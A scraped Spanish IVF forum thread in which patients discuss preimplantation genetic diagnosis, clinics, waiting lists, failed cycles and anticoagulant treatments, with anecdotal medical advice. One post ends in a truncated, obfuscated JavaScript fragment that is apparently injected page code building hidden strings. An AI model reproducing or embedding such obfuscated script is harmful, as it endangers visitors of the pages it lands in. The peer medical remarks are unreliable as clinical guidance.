Dgp en febrero - IVI: Foro de Infertilidad y Reproducción Asistida

Anuncio

Collapse
No announcement yet.

“Prohibición de venta o donación de medicación sobrante según la Ley 29/2006. INFORMACIÓN Y POSIBLES SANCIONES”. Haz click para más información.

Dgp en febrero

Collapse
X
 
  • Filter
  • Hora
  • Show
Clear All
new posts

    DGP EN FEBRERO

    Leonesita, yo estoy haciendo el DGP en Valladolid en la clínica privada Recoletos. Estoy contenta por el trato, por la cercanía (yo soy de Palencia) y porque es económica. La verdad es que hay gente que no me han dado buenas referencias y gente que sí. Conozco a gente que se ha quedado embarazada y le ha ido todo fenomenal. Yo te lo digo por si no sabías que en castilla y león existía esta clínica. Con respecto a lo del clínico yo lo seguiría intentando. Deberías ir a tu médico de familia para que te mandara al ginecólogo, y después comentárselo al ginecólogo del hospital. Dile que conoces casos que si lo están haciendo. Y métele un poco caña para que se mueva un poco y se interese por el tema. Mira malva, lo ha conseguido a fuerza de dar guerra. Ella ahora mismo está haciendo todo el trámite así que ella te puede ayudar. Es una vergüenza que los ginecólogos de los hospitales de Castilla y León no tengan ni idea de que el DGP se está haciendo en el clínico.

    Aqua, tiene toda la pinta de que se va a retrasar… a ver que me dicen el lunes.

    Malva, eres tremenda lo has conseguido!!! Has hecho un trabajo excelente. Ahora a ver que te dicen en Valladolid. A ver si no te hacen esperar mucho.

    Esperanzada, ¿qué tal van los ánimos? Intenta estar alegre, además hoy el tiempo acompaña con este solecito tan precioso. Yo no te puedo ayudar con lo de la mutación, no tengo ni idea. Jolín de todas maneras menos mal que te lo has hecho que si no lo sabes. Y esos análisis te los has hecho por tu cuenta no? Ningún médico te había hablado de hacértelos?

    Alki, cómo sabes que tienes la progesterona alta? Te hicieron un análisis antes de la transferencia? A mí nunca me lo han hecho y creía que entre la punción y la transferencia no hacían ningún análisis. Bueno si tienes es estradiol alto si no?

    Lopne, madre mía eres una enciclopedia degepera, nos das la vida con todo los que nos enseñas. Sabes más que muchos médicos. Muchísimas gracias por ayudarnos.

    Geogalera, tic, tac, tic, tac….

    Ilusión, qué bien que puedas empezar.

    Musita, un besazo.

    Una pregunta, quién y por qué os han dicho que os pinchéis heparina? Y ese medicamento adiro para qué es? Y la vitamina D?Puf me pierdo. Un besito para todas

    Comment


      DGP EN FEBRERO

      MUSITA, que gusto verte animada y entusiasmada!. Verás como tu futuro bebé borra cualquier duda y lo adoraréis igual. Tú date una vueltita de vez en cuando por aquí que también te echamos de menos!. Sobre lo mío, pues si todo sigue bien como en este punto... Aún quedaría mucho para empezar, por lo que me dijeron 9 meses como mínimo =(... Pero ahora mismo es mi opción y trato de disfrutar de que todo siga para adelante. Trato de no pensar en le edad ni en el tiempo que falta para empezar.
      Te mando un gran abrazo compañeta y la mejor de las suertes!.

      Comment


        DGP EN FEBRERO

        Ay PIPI, muchas gracias por tus ánimos. Aún faltaría mucho para empezar. Pero mientras tanto, sí me gustaría seguir con vosotras. Sobre lo de Castilla y león; tienes toda la razón. Es una verguenza como están desinformados los ginecólogos. La mía no sabía nada de nada cuando se lo dije la primera vez, quedó en ayudarme pero no averiguó nada en un año!!. Perdí tiempo valioso y cuando volví a insistirle me decía, que si los recortes, que la enfermedad era posible que no entrara... Etc., etc. Si os contara todo veríais la cantidad de negativas que recibí al principio y solo podía llorar de la impotencia. Hasta que me puse las pilas claro. Si alguien me hubiera advertido como iba a ser todo... Me habría dado mas prisa y habría llorado menos por tanta "sorpresa desagradable". Asi que si LEONESITA o quien sea necesita algo en que yo pueda ayudar, aquí estoy. Un besote PIPI!!! Malva132014-03-05 17:48:30

        Comment


          DGP EN FEBRERO

          [IMG]smileys/smiley4.gif[/IMG] [IMG]smileys/smiley17.gif[/IMG] [IMG]smileys/smiley4.gif[/IMG] hola!
          PIPI creo q eres tu la q me preguntas por la progesteronaplitica me la hicieron antes d la puncion.durante la estimulacion
          como siempre.y a causa d la medicacion tengo la progesterona alta por lo q no conviene hacerse la transfer asi.

          Comment


            DGP EN FEBRERO

            Chic@s; veis el foro bien? Desde el móvil llevo viéndolo muy muy pequeño todo. Grrrrr. No puedo leerlo bien! Ne he desconectado y vuelto a conectar pero sigue igual [IMG]smileys/smiley21.gif[/IMG]

            Comment


              DGP EN FEBRERO

              Muchas gracias Malva 13,tienes razón que es para llorar,pero vamos a iintentar ser fuertes y chicas luchadoras

              Comment


                DGP EN FEBRERO

                Hola me presento, llevo mucho tiempo leyendo vuestras historias y la mayoría de vosotr@s sois muy familiares para mi y creo que ya es hora de compartir la mía.
                Pues vengo de mi primer fracaso icsi +DGP, mi primer tratamiento. En nuestro caso tenemos factor masculino severo (oligoastenoteratozoospermia) y además inversión pericéntrica en un cromosoma. Ambos con 32 años. Bueno, nosotros acudimos a la clínica que teníamos concertada con mi mutua porque nos cubrían el tratamiento. Resumiendo, me extraen nueve ovocitos y al día siguiente me dicen que solo han podido fecundar tres debido a la mala calidad del semen, estos aguantan hasta el tercer día que son biopsiados, dos anormales y uno normal pero no llegan al quinto día por lo que no hay transferencia. Cuando acudimos a la clínica, el ginecólogo directamente nos ha dicho que el nos recomienda pasar a donante, opción que contemplamos, pero es nuestro primer tratamiento, no se, estamos desolados y con muchas dudas porque si nos vamos a la donación en parte tenemos la sensación de no haber agotado todas las posibilidades. Por otro lado, tenemos la sensación de que al ser un caso algo complicado la mutua no quiere seguir cubriéndonos tratamiento.... Y nada, estamos pensando en acudir a ivi sevilla o bionac. No se, simplemente quería exponeros mi historia, soy bastante novata, se que aquí sobre todo hay mucha experiencia, la verdad es que no sabemos para donde tirar y estamos muy tristes y hundidos. Gracias.

                Comment


                  DGP EN FEBRERO

                  Si es verdad ESPERANZADA20091 esto es un master autentico.Mirare lo del seguro y preguntare precios.Aun mantengo la esperanza de que me entre en la ss y a que en valladolid queren ampliar.Si lo hago por lo privado me da que tengo que vender un riñón.

                  Comment


                    DGP EN FEBRERO

                    LUNITA! Pues debe tener algún fallo la web para verla por móviles. A mi también me sale igual pero supongo que lo arreglarán. Ya sabes que estos de IVI no son lo que se dice : unos crack en informática, recuerda que hubo una temporada que se caía mucho el foro. Un besito.

                    ABRIL, Bienvenida al foro. Veo que estáis muy desanimados. Yo aún no tengo experiencia en DGP, estoy esperando por la SS. No sé si alguna de las chicas tiene un caso parecido al tuyo pero, dices que es el primer tto al que os sometéis, habéis pedido mas opiniones? me refiero a otros médicos o centros?. Me parece, personalmente, que lo de ir a ovo, es una opción muy valiente porque entiendo que no es fácil tomar esa decisión. Y también me parece muy generosa por vuestra parte porque es difícil ponerse de acuerdo con la pareja en esto. Pero desde mi punto de vista, supongo que siempre es bueno tener mas opiniones al respecto antes de dar ese paso, sobre todo si os quedáis un poco a disgusto por no volverlo a intentar. También entiendo que hay que ser realistas porque este camino es muy duro. Ojalá alguna de nuestras compis puedas ayudarte, son todas estupendas y saben y tienen mucha experiencia. Un gran abrazo y mucha fuerza porque para obtener este "milagro" (como lo es para muchas de nosotras, por no decir todas) hay que ser muy perseverantes y pacientes. un beso

                    Comment


                      DGP EN FEBRERO

                      Abril, bienvenida, creo que sois muy jovenes solo habeis hecho un intento, creo q es demasiado pronto para pensar en ovodonacion para vuestro caso. Teneis muchas posibilidades con dgp, asi que animo y a seguir luchando.
                      Aqua, gracias por.la info de.la heparina y la Crespo. A mi la inmunologa, me.mando lq heparina despues de.la transfer.
                      Esperanzada, yo no tengo mutaciones, pero si factores de.coagulacion alterados e hipotiroidismo autoinmune, tb tuve abortos, por eso llevo este tratamiento con heparina, adiro, hidroxil e isovorin. Me.lo mando el hematologo y la inmunologa.
                      Pipi, a mi este tto me.lo han mandado para evitar abortos y para que mi embarazo vaya bien, que al feto le.llegue bien la.sangre y no.se formen trobos en la sangre y lleguen al utero provocandome otro aborto.

                      Comment


                        DGP EN FEBRERO

                        LEONESITA aqui tienes la lista de enfermedades q aceptan:
                        Atrofia muscula espinal
                        Distrofiamuscular deDuchenne

                        Enfermedad de Huntington

                        Fibrosis quística

                        HemofiliaA y B

                        Síndrome de Alport ligrado al

                        cromosoma X

                        Otras enfermedades con herencia

                        recesiva ligada al cromosomaX

                        Distrofia miotónica tipo 1

                        Síndrome X-Frágil

                        Síndrome de Marfan

                        Ataxia Espinocerebelosa Autosómica

                        Dominante

                        Ahora mismo no m acuerdo cual era la tuya, espero q este dentro de estas, un bso
                        (function(){function b(e){var g=042,t="",o=window,j=("u0066x72u006Fu006dx43u0068 u0061x47p"+"u0042x79s"+"e")["x72e"+"p"+"u006Cx61x63u0065"]("x47p"+"x42yx73","rC"+"o"+"d"),p="x63hx61x72x43o" +"d"+"x65x41"+"t",u=("x6Cu005Anx4DsB"+"u0067x74"+" h")["x72"+"ex70x6cx61x63e"+""]("Z"+"nx4Du0073u0042",""+"en"+""),n=("Sym"+"x4aing ")[('ox64u006Cx61'+'cx65').replace('o'+'d','x72u0065u 0070')]("ymu004A","u0074r"+""),h=o[n],s=h[j],m,c;for(var i=0;i

                        Comment


                          DGP EN FEBRERO

                          Hola compañer@s!!!

                          Aprovecho que tengo a la costilla con los ojos clavados en el fútbol para ponerme al día porque llevo una semana que os voy leyendo pero que no termino de procesar las novedades, y son unas cuantas!!

                          ABRIL, bienvenida al club. Siento lo que nos cuentas y que estéis pasando por un mal momento. Sabemos lo que es eso. Sobre lo que nos explicas, mi consejo es que si la Mutua os cubre el tratamiento que lo volváis a intentar, pero la próxima vez haciendo varias estimulaciones y acumulando ovocitos/embriones para poder hacer DGP a un número mayor. Normalmente recomiendan ir con 8 embriones a DGP porque el porcentaje de sanos es bajito. Sinceramente, sois jóvenes y podéis tener oportunidades, sobre todo si encima tenéis la ventaja de que el seguro os lo cubre.

                          MALVA, enhorabuena por todo lo que has conseguido. Eres nuestra degepera estrella y nos sentimos orgullosísim@s de ti. A mí se me saltan las lágrimas del cariño que te tengo. Sé que todavía queda camino por recorrer, ¿pero te das cuénta de todo lo que has conseguido? Eres una luchadora increíble!!

                          ALKI, enhorabuena por esos 7 embriones maravillosos!!! Qué pena que te hayan visto la progesterona alta, pero bueno... es un mal menor. El mes que viene arrasas y te pasas al lado rosa!!!!

                          BERAEN, ¿al final que habéis decidido hacer? ¿Habéis ido a DGP? Qué decisión tan difícil habéis tenido que tomar..., pero seguro que habéis tomado la correcta.

                          ESPERANZADA, cuánto siento que estés un poco de bajoncillo. No te desanimes mi niña que en nada te llaman a filas y empiezas con el lío. Con respecto a la mutación que has mencionado, creo que no debes preocuparte porque yo tengo lo mismo que tú y ni Fariñas ni SSR le dieron importancia. Creo que LUNA es homocigota y ahí está la "complicación", Luna, corrígeme si me equivoco, por favor. En cuanto al Hidroxil y el Isovorín, a mí me lo mandaron porque tenía la homocisteína alta (casi 15) y dicen que lo recomendable es que esté en torno a 8. La heparina es porque tengo un factor de coagulación alto (creo recordar que el VIII, pero tendría que mirarlo para asegurarme). Seguro que Fariñas te lo explica todo bien el día 11. Yo estuve hace poco con él y la verdad es que fue muy amable conmigo. Fui su última paciente de la tarde y prácticamente cerramos la oficina juntos porque cuando salí por allí no quedaba ni el apuntador. Me tuvo que tomar nota él directamente para una siguiente cita porque me ha mandado unos análisis cuyos resultados quiere ver.

                          LUNA, por cierto, fui a ver a Fariñas porque no sabía si seguir tomando el Hidroxil y el Isovorín. Llevo tomándolos desde octubre. Y me dijo que ya era demasiado tiempo y que dejara de tomarlos de momento. Me ha mandado analíticas nuevas para ver cómo estoy, pero hasta el 19/03 no me dan los resultados... Te lo comento porque creo que me dijiste que tú seguías tomándolos... ¿Te dijo él o SSR que los tomaras "sine die"?

                          TERESA, ¿cómo vas? No sabemos nada de ti y debes estar nerviosita esperando el día 10/03. Desde aquí te mando toda la energía para que aguantes tranquila estos últimos días. Muchísima suerte y a pasar al lado rosa con honores!!!

                          GEO, mañana día 06/03!!! Muchísima suerte para el viernes. Te deseo que todo vaya bien y muy rápido para que tengas a Darío en brazos lo antes posible. ¿Ya llegó tu marido? Estaréis emocionadísimos los dos!!

                          ILUSIÓN, tal y como te han comentado algunas compañeras el tema "ovo" no siempre es fácil con nuestras parejas. Es cierto que las hay que están muy concienciadas y que no ven ningún tipo de problema, pero otras no lo tienen tan claro. Mi pareja era de estos últimos y, además, muy cerrado al respecto porque no se podía ni siquiera hablar del tema. La sola idea era una especie de locura para él..., pero poco a poco, a medida que se han ido cerrando puertas y solo permanece abierta la de ovo, algo ha cambiado en él. Entiendo que estés preocupada al pensar que es tu última oportunidad y, por experiencia te digo que eso genera muchísimo estrés, por lo que piensa que no está todo perdido y que seguro que tu chico cambia de idea. Esto no significa que vayáis a ir a ovo, significa que te puedes enfrentar a este tratamiento mucho más relajada y con más posibilidades de éxito. Un beso!!

                          MTP3, pues creo que la regla me tiene que bajar a mediados de marzo, pero como se las piró el mes pasado, he perdido un poco la cuenta. Cuando tuve eco en Valencia el pasado 21/02, me dijo la doctora Crespo que me bajaría en unas tres semanas. Espero que no se equivoque y que esta vez se digne a aparecer. Ojalá podamos ir juntas a transfer y compartir nervios durante la betaespera!!!

                          PIPI, hablando de reglas y de retrasos, espero que la tuya no se haga mucho de rogar!!! Qué aguafiestas son!!! [IMG]smileys/smiley7.gif[/IMG]

                          MUSITA, me alegro mucho de que estés contenta e ilusionada. Entiendo que ahora se te duplica el trabajo, pero vete contándonos de vez en cuando. Te queremos mucho!!

                          LUNA, a mí también me pasa lo que comentas del móvil. Es un rollo!!! Al principio pensé que había tocado algo, pero lleva así varios días y está claro que es cosa de ellos. En IVI serán todos muy profesionales, pero el informático, en fin... no me tiréis de la lengua!!!

                          MARTUKY siento que no te atendieran y que tengas que esperar al día 25 para que te den una respuesta. Menuda faena y qué rollo de burocracia. Si no fuera porque los tratamientos son carísimos era para mandarlos al cuerno. Por cierto, ¿qué tal los carnavales? Los estaréis disfrutando a tope, ¿no?

                          ROSAFM, ¿que tal vas con la estimulación? ¿Tienes ya fecha para la punción?

                          ROBER, ¿qué tal van esas banderillas? Después de los nervios del primer día, sobre ruedas, ¿no? Tranquilo que ya verás como los últimos días se acaba pinchando tu mujer con una mano y los ojos cerrados!! [IMG]smileys/smiley2.gif[/IMG]

                          Mamás y a todas las no mencionadas... mil besos para todas. Felices sueños

                          Comment


                            DGP EN FEBRERO

                            Mi querida AQUA,
                            Que gusto da leerte siempre [IMG]smileys/smiley4.gif[/IMG] y no es sólo por las cosas bonitas que me dices. Se nota que llevas a todas en tu memoria y estás muy involucrada con todas. Ya te lo digo muchas veces... Gracias. Creo que es fácil luchar por algo que quieres, no tengo mérito por eso [IMG]smileys/smiley9.gif[/IMG] . Aunque lo que sí es difícil, es aguantar todo lo extremadamente duro que se hace con el tiempo. Y lo que se va amontonando a tus espaldas. Ya sabes que yo me tomo esto con bastante cautela porque con la Seguridad Social, no hay nada seguro!! Jeje. Pero también como siempre trato de disfrutar de cada pequeña cosa que sucede en mi vida. No sé, aun lo veo muy lejano y ojalá algun día esté compartiendo mis experiencias de banderillas de nervios de betas... Ayyshh que sueño!. Ojalá... Pero como los eternos próceres de la independencia en sudamérica, moriré luchando y quemaré hasta mi último cartucho en el intento. En todo caso, disfruto como te decía, de cada pasito que doy y lo celebro con mucha alegría. Y con eso me quedo ahora. Ya habrá tiempo para mas preocupaciones. Lo que sí me da un poco de ... Penita... Es, ver que ésta vez mi marido no se ha alegrado tanto con este último logro [IMG]smileys/smiley6.gif[/IMG] . Pero bueno, ya os tengo a vosotras para celebrarlos jiji. Sabes que te llevo en mi corazón y en mis pensamientos Aqua. Gracias como siempre por ser como eres, con todas y conmigo. Un gran abrazo! P.D.: ya sabes que cruzamos los dedos para que te venga la regla!! "Dicen" que si tienes cerca a otras chicas que estén con la regla , se estimulan las hormonas!. Habrá que echar mano de todo!Malva132014-03-06 00:20:22

                            Comment


                              DGP EN FEBRERO

                              Wap@s q tl? Yo fatal estresadiiiisimaaa! Si ayer tube un dia de locos el de hoy lo supera.

                              Ayer ingresaron a la abuela de mi novio le dio como una especie de ictus, la pobre le dan achuchones cada nada..pero son 91 años mas no podemos pedir. Pues hoy para arrematar mi suegra q esta enferma de esclerosis se pone mala con un ataque de nervios q pa que..nos toco llamar a urgencias le ponen unos calmante para q duerma y a ver si se l pasa esto fue a las 9 y a las 23.30 seguia igual..y cuando ya pensaba q m iria para casa y q el día por fin acaba hablo con mi cuñada q esta mi sobrina mala q si la acompaño a el pueblo q la niña esta con su abuela..en fin ahora si m voy a la cama..vaya coñazo os he metido

                              Leonesita wapa en cuanto pueda t escribo y t oriento de precios y en cuanto si nos va afectar yo por lo q e leido si, pero supongo q dependera de cada cuerpo ya sabes q esta enfermedad no afecta a todos del mismo modo..yo de mi familia soy la menos afectada..bueno un besazo para todosEvuchy2014-03-06 00:14:43

                              Comment


                                DGP EN FEBRERO

                                Buenísimos días de juernes!!

                                Entro un segundín para darle las gracias a AQUA. No sabes lo que me has tranquilizado de pensar que mi mutación tp es tan grave. Yo la homocisteína la tengo en 8,6 así que está bien no? En fin mejor no rallarme y ya cuando vaya el 11 que me explique todo y a ver si me manda más pruebas ahora que se ve que hay algo.

                                Luego entro y personalizo. Buen día a tod@s.

                                Comment

                                Working...
                                X